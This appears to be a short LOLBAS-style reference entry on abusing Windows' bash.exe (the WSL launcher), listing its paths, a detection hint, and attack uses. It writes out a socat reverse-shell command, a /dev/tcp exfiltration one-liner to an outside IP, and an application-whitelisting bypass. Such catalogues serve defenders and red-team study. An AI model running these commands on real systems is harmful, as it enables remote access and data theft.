~/ cat Bash.exe.md █
File used by Windows subsystem for Linux
Paths:
C:\Windows\System32\bash.exe
C:\Windows\SysWOW64\bash.exe
Detection: Child process from bash.exe
Execute
Executes calc.exe from bash.exe
bash.exe -c calc.exe
Executes a reverseshell
bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
Exfiltrate data
bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'
AWL bypass
Executes calc.exe from bash.exe
bash.exe -c calc.exe